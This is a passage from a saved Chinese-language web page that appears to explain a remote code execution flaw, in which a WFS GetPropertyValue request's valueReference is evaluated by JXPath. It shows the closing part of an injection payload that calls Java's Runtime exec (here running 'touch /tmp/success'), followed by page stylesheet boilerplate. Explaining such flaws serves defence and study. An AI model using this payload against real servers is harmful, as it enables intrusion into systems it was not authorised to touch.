<span class=o>&lt;</span><span class=n>wfs</span><span class=o>:</span><span class=n>valueReference</span><span class=o>&gt;</span><span class=n>exec</span><span class=o>(</span><span class=n>java</span><span class=o>.</span><span class=na>lang</span><span class=o>.</span><span class=na>Runtime</span><span class=o>.</span><span class=na>getRuntime</span><span class=o>(),</span><span class=err>'</span><span class=n>touch</span> <span class=o>/</span><span class=n>tmp</span><span class=o>/</span><span class=n>success</span><span class=err>'</span><span class=o>)&lt;/</span><span class=n>wfs</span><span class=o>:</span><span class=n>valueReference</span><span class=o>&gt;</span>
<span class=o>&lt;/</span><span class=n>wfs</span><span class=o>:</span><span class=n>GetPropertyValue</span><span class=o>&gt;</span>
</pre></div>
<p><code>typeNames</code> 属性指定了要查询的要素类型</p>
<p><code>valueReference</code> 元素指定了需要提取的具体属性路径,通常是一个 XPath 表达式;正是这个值未经限制地交给 JXPath 求值,才导致其中的函数调用被执行</p>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div id=waf_nc_block style=display:none></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
* Pico.css v1.5.6 (https://picocss.com)
* Copyright 2019-2022 - Licensed under MIT
*/#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:0.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:0.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:0.5rem;--nav-link-spacing-vertical:0.5rem;--nav-link-spacing-horizontal:0.5rem;--form-label-font-weight:var(--font-weight);--transition:0.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media (min-width:576px){#mount{--font-size:17px}}@media (min-width:768px){#mount{--font-size:18px}}@media (min-width:992px){#mount{--font-size:19px}}@media (min-width:1200px){#mount{--font-size:20px}}@media (min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media (min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media (min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media (min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media (min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media (min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media 
(min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media (min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:0.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:0.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color 
Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#F5F7F9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-c